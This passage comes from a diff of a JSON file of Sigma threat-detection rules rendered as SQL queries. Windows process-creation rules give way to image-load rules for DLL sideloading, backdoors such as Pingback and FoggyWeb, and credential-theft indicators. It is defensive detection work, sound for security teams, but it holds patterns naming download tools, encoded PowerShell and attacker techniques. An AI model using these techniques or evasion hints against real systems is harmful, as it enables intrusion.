Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate import of keys", - "Evernote" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" - ], - "filename": "proc_creation_win_regedit_import_keys.yml" - }, - { - "title": "File or 
Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program 
Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "status": "experimental", - "description": "Performs execution of specified file, can be used for 
defensive evasion.", - "author": "frack113", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "test", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. 
This is could be used as a way to launch a reverse shell or execute live python code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "False positives are expected if VLC is installed in non-default locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 
'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT 
((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "status": "test", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": 
"37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE 
